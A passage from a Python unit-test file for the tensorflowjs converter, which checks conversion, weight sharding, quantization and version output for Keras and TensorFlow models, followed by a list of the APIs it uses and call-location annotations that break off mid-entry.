# 2. Convert the HDF5 file to tensorflowjs format.
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Load the tensorflowjs artifacts as a keras.Model instance.
with tf.Graph().as_default(), tf.compat.v1.Session():
model_2 = tfjs.converters.load_keras_model(
os.path.join(self._tmp_dir, 'model.json'))
model_2_json = model_2.to_json()
self.assertEqual(model_json, model_2_json)
def testVersion(self):
process = subprocess.Popen(
['tensorflowjs_converter', '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertIn(
tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
tf.compat.as_bytes(stdout))
process = subprocess.Popen(
['tensorflowjs_converter', '-v'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertIn(
tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
tf.compat.as_bytes(stdout))
class ConvertTfKerasSavedModelTest(tf.test.TestCase):
def setUp(self):
super(ConvertTfKerasSavedModelTest, self).setUp()
self._tmp_dir = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(ConvertTfKerasSavedModelTest, self).tearDown()
def _createSimpleSequentialModel(self):
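    # Small Reshape -> LSTM -> Dense model used to exercise sequential-model conversion.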
model = keras.Sequential()
model.add(keras.layers.Reshape([2, 3], input_shape=[6]))
model.add(keras.layers.LSTM(10))
model.add(keras.layers.Dense(1, activation='sigmoid'))
return model
def _createNestedSequentialModel(self):
model = keras.Sequential()
model.add(keras.layers.Dense(6, input_shape=[10], activation='relu'))
model.add(self._createSimpleSequentialModel())
return model
def _createFunctionalModelWithWeights(self):
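    # Two-input functional model joined by a Concatenate layer, used to test functional-model conversion.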
input1 = keras.Input(shape=[8])
input2 = keras.Input(shape=[10])
y = keras.layers.Concatenate()([input1, input2])
y = keras.layers.Dense(4, activation='softmax')(y)
model = keras.Model([input1, input2], y)
return model
def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
model_json_path = os.path.join(tfjs_output_dir, 'model.json')
self.assertTrue(os.path.isfile(model_json_path))
# 3. Convert the tfjs model to keras h5 format.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras', model_json_path, new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
self.assertTrue(os.path.isfile(new_h5_path))
# 4. Load the model back and assert on the equality of the predict
# results.
model_prime = keras.models.load_model(new_h5_path)
new_y = model_prime.predict(x)
self.assertAllClose(y, new_y)
def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x1 = np.random.randn(4, 8)
x2 = np.random.randn(4, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createFunctionalModelWithWeights()
y = model.predict([x1, x2])
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Use explicit --output_format value: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
'--output_format', 'tfjs_layers_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
model_json_path = os.path.join(tfjs_output_dir, 'model.json')
self.assertTrue(os.path.isfile(model_json_path))
# 3. Convert the tfjs model to keras h5 format.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras', model_json_path, new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
self.assertTrue(os.path.isfile(new_h5_path))
# 4. Load the model back and assert on the equality of the predict
# results.
model_prime = keras.models.load_model(new_h5_path)
new_y = model_prime.predict([x1, x2])
self.assertAllClose(y, new_y)
def testUsingIncorrectKerasSavedModelRaisesError(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Use incorrect --input_format value: keras
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format', 'keras',
self._tmp_dir, tfjs_output_dir
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertIn(
b'Expected path to point to an HDF5 file, '
b'but it points to a directory', tf.compat.as_bytes(stderr))
def testConvertTfjsLayersModelIntoShardedWeights(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
weights = model.get_weights()
total_weight_bytes = sum(np.size(w) for w in weights) * 4
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs_layers_model format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_layers_model,
# with sharded weights.
weight_shard_size_bytes = int(total_weight_bytes * 0.3)
# Due to the shard size, there ought to be 4 shards after conversion.
sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_layers_model',
'--weight_shard_size_bytes', str(weight_shard_size_bytes),
os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the sharded weight files and their sizes.
weight_files = sorted(
glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 4)
weight_file_sizes = [os.path.getsize(f) for f in weight_files]
self.assertEqual(sum(weight_file_sizes), total_weight_bytes)
self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])
self.assertEqual(weight_file_sizes[0], weight_file_sizes[2])
self.assertLess(weight_file_sizes[3], weight_file_sizes[0])
# 5. Convert the sharded tfjs_layers_model back into a keras h5 file.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
os.path.join(sharded_model_dir, 'model.json'), new_h5_path
])
process.communicate()
self.assertEqual(0, process.returncode)
with tf.Graph().as_default(), tf.compat.v1.Session():
# 6. Load the keras model and check the predict() output is close to
# before.
new_model = keras.models.load_model(new_h5_path)
new_y = new_model.predict(x)
self.assertAllClose(new_y, y)
def testConvertTfjsLayersModelWithQuantization(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
weights = model.get_weights()
total_weight_bytes = sum(np.size(w) for w in weights) * 4
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs_layers_model format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_layers_model,
# with uint16 quantization.
weight_shard_size_bytes = int(total_weight_bytes * 0.3)
# Due to the shard size, there ought to be 4 shards after conversion.
sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_layers_model',
'--quantization_bytes', '2',
os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the quantized weight file and its size.
weight_files = sorted(
glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 1)
weight_file_size = os.path.getsize(weight_files[0])
# The size of the weight file should reflect the uint16 quantization.
self.assertEqual(weight_file_size, total_weight_bytes // 2)
def testConvertTfjsLayersModelToTfjsGraphModel(self):
x = np.random.randn(8, 10)
# 1. Create a model for testing.
model = keras.Sequential()
model.add(keras.layers.Dense(10, activation='relu', input_shape=[4]))
model.add(keras.layers.Dense(1, activation='sigmoid'))
h5_path = os.path.join(self._tmp_dir, 'model.h5')
model.save(h5_path)
# 2. Convert the keras saved model to tfjs_layers_model format.
layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras',
h5_path, layers_model_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_graph_model.
graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_graph_model',
os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the model.json and weight file and its size.
self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json')))
weight_files = sorted(
glob.glob(os.path.join(graph_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 1)
if __name__ == '__main__':
tf.test.main()
| [
"tensorflow.python.eager.def_function.function",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.models.load_model",
"tensorflow.keras.experimental.export_saved_model",
"tensorflow.compat.as_bytes",
"tensorflow.python.ops.variables.Variable",
"tensorflow.compat.v1.Session",
"tensorflow.compat.v1.global_variables_initializer",
"tensorflow.compat.v1.placeholder",
"tensorflow.keras.layers.Input",
"tensorflow.Graph",
"tensorflow.compat.v1.saved_model.builder.SavedModelBuilder",
"tensorflow.keras.layers.Reshape",
"tensorflow.keras.Sequential",
"tensorflow_hub.create_module_spec",
"tensorflow.python.training.tracking.tracking.AutoTrackable",
"tensorflow.python.saved_model.save.save",
"subprocess.Popen",
"tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def",
"os.path.isdir",
"tensorflow.keras.models.Model",
"tensorflow.compat.v1.nn.softmax",
"os.path.getsize",
"tensorflow_hub.Module",
"tensorflow.Variable",
"numpy.size",
"tensorflowjs.converters.save_keras_model",
"os.path.isfile",
"tensorflow.keras.layers.LSTM",
"os.path.dirname",
"tempfile.mkdtemp",
"tensorflow.compat.v1.constant",
"tensorflow.keras.Input",
"numpy.random.randn",
"tensorflow.compat.v1.name_scope",
"tensorflow.compat.v1.matmul",
"tensorflow.compat.v1.get_variable",
"tensorflow.keras.layers.Concatenate",
"os.path.join",
"tensorflow.python.framework.constant_op.constant",
"tensorflowjs.__version__.count",
"tensorflow.test.main",
"json.load",
"shutil.rmtree",
"tensorflow.keras.Model",
"tensorflow_hub.add_signature"
] | [((1826, 1850), 'tensorflow.keras.layers.Input', 'keras.layers.Input', (['(3,)'], {}), '((3,))\n', (1844, 1850), False, 'from tensorflow import keras\n'), ((2177, 2236), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': '[input_tensor]', 'outputs': '[output]'}), '(inputs=[input_tensor], outputs=[output])\n', (2195, 2236), False, 'from tensorflow import keras\n'), ((2622, 2632), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2630, 2632), True, 'import tensorflow as tf\n'), ((3916, 3952), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(1.0)'], {'shape': '[1]'}), '(1.0, shape=[1])\n', (3936, 3952), False, 'from tensorflow.python.framework import constant_op\n'), ((3961, 3985), 'tensorflow.python.training.tracking.tracking.AutoTrackable', 'tracking.AutoTrackable', ([], {}), '()\n', (3983, 3985), False, 'from tensorflow.python.training.tracking import tracking\n'), ((3998, 4021), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(3.0)'], {}), '(3.0)\n', (4016, 4021), False, 'from tensorflow.python.ops import variables\n'), ((4033, 4056), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(2.0)'], {}), '(2.0)\n', (4051, 4056), False, 'from tensorflow.python.ops import variables\n'), ((4067, 4121), 'tensorflow.python.eager.def_function.function', 'def_function.function', (['(lambda x: root.v1 * root.v2 * x)'], {}), '(lambda x: root.v1 * root.v2 * x)\n', (4088, 4121), False, 'from tensorflow.python.eager import def_function\n'), ((4178, 4208), 'tensorflow.python.saved_model.save.save', 'save', (['root', 'save_path', 'to_save'], {}), '(root, save_path, to_save)\n', (4182, 4208), False, 'from tensorflow.python.saved_model.save import save\n'), ((4580, 4590), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (4588, 4590), True, 'import tensorflow as tf\n'), ((33845, 33859), 'tensorflow.test.main', 'tf.test.main', ([], {}), '()\n', (33857, 33859), True, 'import tensorflow as tf\n'), ((1863, 1986), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'use_bias': '(True)', 'kernel_initializer': '"""ones"""', 'bias_initializer': '"""zeros"""', 'name': "(layer_name_prefix + '1')"}), "(4, use_bias=True, kernel_initializer='ones',\n bias_initializer='zeros', name=layer_name_prefix + '1')\n", (1881, 1986), False, 'from tensorflow import keras\n'), ((2039, 2138), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(2)'], {'use_bias': '(False)', 'kernel_initializer': '"""ones"""', 'name': "(layer_name_prefix + '2')"}), "(2, use_bias=False, kernel_initializer='ones', name=\n layer_name_prefix + '2')\n", (2057, 2138), False, 'from tensorflow import keras\n'), ((4450, 4473), 'tensorflow.Variable', 'tf.Variable', (['[2.0, 4.0]'], {}), '([2.0, 4.0])\n', (4461, 4473), True, 'import tensorflow as tf\n'), ((4482, 4524), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', ([], {'dtype': 'tf.float32'}), '(dtype=tf.float32)\n', (4506, 4524), True, 'import tensorflow as tf\n'), ((4529, 4571), 'tensorflow_hub.add_signature', 'hub.add_signature', ([], {'inputs': 'x', 'outputs': '(x * w)'}), '(inputs=x, outputs=x * w)\n', (4546, 4571), True, 'import tensorflow_hub as hub\n'), ((4629, 4669), 'tensorflow_hub.create_module_spec', 'hub.create_module_spec', (['double_module_fn'], {}), '(double_module_fn)\n', (4651, 4669), True, 'import tensorflow_hub as hub\n'), ((4678, 4694), 'tensorflow_hub.Module', 'hub.Module', (['spec'], {}), '(spec)\n', (4688, 4694), True, 'import tensorflow_hub as hub\n'), 
((4725, 4758), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'graph': 'graph'}), '(graph=graph)\n', (4745, 4758), True, 'import tensorflow as tf\n'), ((5014, 5032), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (5030, 5032), False, 'import tempfile\n'), ((5062, 5111), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_saved_model"""'], {}), "(cls.class_tmp_dir, 'tf_saved_model')\n", (5074, 5111), False, 'import os\n'), ((5144, 5196), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_saved_model_v1"""'], {}), "(cls.class_tmp_dir, 'tf_saved_model_v1')\n", (5156, 5196), False, 'import os\n'), ((5369, 5417), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_hub_module"""'], {}), "(cls.class_tmp_dir, 'tf_hub_module')\n", (5381, 5417), False, 'import os\n'), ((5510, 5542), 'shutil.rmtree', 'shutil.rmtree', (['cls.class_tmp_dir'], {}), '(cls.class_tmp_dir)\n', (5523, 5542), False, 'import shutil\n'), ((5923, 5941), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (5939, 5941), False, 'import tempfile\n'), ((6013, 6041), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (6026, 6041), False, 'import os\n'), ((9021, 9192), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'nonsensical_format', self.\n _tmp_dir, self._tmp_dir]"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--input_format',\n 'nonsensical_format', self._tmp_dir, self._tmp_dir], stdout=subprocess.\n PIPE, stderr=subprocess.PIPE)\n", (9037, 9192), False, 'import subprocess\n'), ((9452, 9549), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter'], stdout=subprocess.PIPE, stderr\n =subprocess.PIPE)\n", (9468, 9549), False, 'import subprocess\n'), ((15253, 15280), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (15265, 15280), False, 'import os\n'), ((15295, 15463), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir,\n output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_v1_dir, output_dir])\n", (15311, 15463), False, 'import subprocess\n'), ((16083, 16110), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (16095, 16110), False, 'import os\n'), ((16125, 16237), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])\n", (16141, 16237), False, 'import subprocess\n'), ((16915, 16942), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (16927, 16942), False, 'import os\n'), ((16957, 17122), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_dir, output_dir])\n", (16973, 17122), False, 'import subprocess\n'), ((18336, 18363), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', 
(18348, 18363), False, 'import os\n'), ((18378, 18490), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])\n", (18394, 18490), False, 'import subprocess\n'), ((19283, 19334), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (19295, 19334), False, 'import os\n'), ((19560, 19659), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (19576, 19659), False, 'import subprocess\n'), ((19825, 19866), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model_2.h5"""'], {}), "(self._tmp_dir, 'model_2.h5')\n", (19837, 19866), False, 'import os\n'), ((20632, 20683), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (20644, 20683), False, 'import os\n'), ((20909, 21008), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (20925, 21008), False, 'import subprocess\n'), ((21455, 21565), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--version']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--version'], stdout=subprocess\n .PIPE, stderr=subprocess.PIPE)\n", (21471, 21565), False, 'import subprocess\n'), ((21804, 21906), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '-v']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '-v'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n", (21820, 21906), False, 'import subprocess\n'), ((22281, 22299), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (22297, 22299), False, 'import tempfile\n'), ((22330, 22358), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (22343, 22358), False, 'import os\n'), ((22507, 22525), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (22523, 22525), False, 'from tensorflow import keras\n'), ((22755, 22773), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (22771, 22773), False, 'from tensorflow import keras\n'), ((22977, 22999), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[8]'}), '(shape=[8])\n', (22988, 22999), False, 'from tensorflow import keras\n'), ((23013, 23036), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[10]'}), '(shape=[10])\n', (23024, 23036), False, 'from tensorflow import keras\n'), ((23157, 23189), 'tensorflow.keras.Model', 'keras.Model', (['[input1, input2]', 'y'], {}), '([input1, input2], y)\n', (23168, 23189), False, 'from tensorflow import keras\n'), ((32381, 32403), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (32396, 32403), True, 'import numpy as np\n'), ((32454, 32472), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (32470, 32472), False, 'from tensorflow import keras\n'), ((32621, 32660), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.h5"""'], {}), "(self._tmp_dir, 'model.h5')\n", (32633, 32660), False, 'import os\n'), 
((32784, 32826), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_layers"""'], {}), "(self._tmp_dir, 'tfjs_layers')\n", (32796, 32826), False, 'import os\n'), ((32900, 33009), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path,\n layers_model_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, layers_model_output_dir])\n", (32916, 33009), False, 'import subprocess\n'), ((33189, 33230), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_graph"""'], {}), "(self._tmp_dir, 'tfjs_graph')\n", (33201, 33230), False, 'import os\n'), ((2669, 2704), 'tensorflow.compat.v1.name_scope', 'tf.compat.v1.name_scope', (['name_scope'], {}), '(name_scope)\n', (2692, 2704), True, 'import tensorflow as tf\n'), ((2716, 2766), 'tensorflow.compat.v1.constant', 'tf.compat.v1.constant', (['[[37.0, -23.0], [1.0, 4.0]]'], {}), '([[37.0, -23.0], [1.0, 4.0]])\n', (2737, 2766), True, 'import tensorflow as tf\n'), ((2777, 2821), 'tensorflow.compat.v1.get_variable', 'tf.compat.v1.get_variable', (['"""w"""'], {'shape': '[2, 2]'}), "('w', shape=[2, 2])\n", (2802, 2821), True, 'import tensorflow as tf\n'), ((2832, 2857), 'tensorflow.compat.v1.matmul', 'tf.compat.v1.matmul', (['x', 'w'], {}), '(x, w)\n', (2851, 2857), True, 'import tensorflow as tf\n'), ((2873, 2899), 'tensorflow.compat.v1.nn.softmax', 'tf.compat.v1.nn.softmax', (['y'], {}), '(y)\n', (2896, 2899), True, 'import tensorflow as tf\n'), ((2973, 3034), 'tensorflow.compat.v1.saved_model.builder.SavedModelBuilder', 'tf.compat.v1.saved_model.builder.SavedModelBuilder', (['save_path'], {}), '(save_path)\n', (3023, 3034), True, 'import tensorflow as tf\n'), ((4781, 4824), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ([], {}), '()\n', (4822, 4824), True, 'import tensorflow as tf\n'), ((6049, 6077), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (6062, 6077), False, 'import shutil\n'), ((6178, 6205), 'tensorflowjs.__version__.count', 'tfjs.__version__.count', (['"""."""'], {}), "('.')\n", (6200, 6205), True, 'import tensorflowjs as tfjs\n'), ((6364, 6418), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (6396, 6418), True, 'import tensorflowjs as tfjs\n'), ((8039, 8061), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (8059, 8061), True, 'import tensorflow as tf\n'), ((8157, 8212), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model1', 'self._tmp_dir'], {}), '(model1, self._tmp_dir)\n', (8189, 8212), True, 'import tensorflowjs as tfjs\n'), ((8298, 8320), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (8318, 8320), True, 'import tensorflow as tf\n'), ((9364, 9390), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (9382, 9390), True, 'import tensorflow as tf\n'), ((9709, 9735), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (9727, 9735), True, 'import tensorflow as tf\n'), ((9819, 9841), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (9839, 9841), True, 'import tensorflow as tf\n'), ((9958, 10009), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (9970, 10009), False, 'import os\n'), ((10081, 10180), 
'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (10097, 10180), False, 'import subprocess\n'), ((12252, 12274), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (12272, 12274), True, 'import tensorflow as tf\n'), ((12391, 12442), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (12403, 12442), False, 'import os\n'), ((12514, 12641), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir])\n", (12530, 12641), False, 'import subprocess\n'), ((15148, 15174), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (15166, 15174), True, 'import tensorflow as tf\n'), ((19228, 19267), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (19240, 19267), False, 'import os\n'), ((19369, 19391), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (19389, 19391), True, 'import tensorflow as tf\n'), ((20277, 20299), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (20297, 20299), True, 'import tensorflow as tf\n'), ((20317, 20353), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (20340, 20353), False, 'from tensorflow import keras\n'), ((20577, 20616), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (20589, 20616), False, 'import os\n'), ((20718, 20740), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (20738, 20740), True, 'import tensorflow as tf\n'), ((21200, 21222), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (21220, 21222), True, 'import tensorflow as tf\n'), ((21695, 21751), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (["('tensorflowjs %s' % tfjs.__version__)"], {}), "('tensorflowjs %s' % tfjs.__version__)\n", (21713, 21751), True, 'import tensorflow as tf\n'), ((21761, 21787), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\n', (21779, 21787), True, 'import tensorflow as tf\n'), ((22037, 22093), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (["('tensorflowjs %s' % 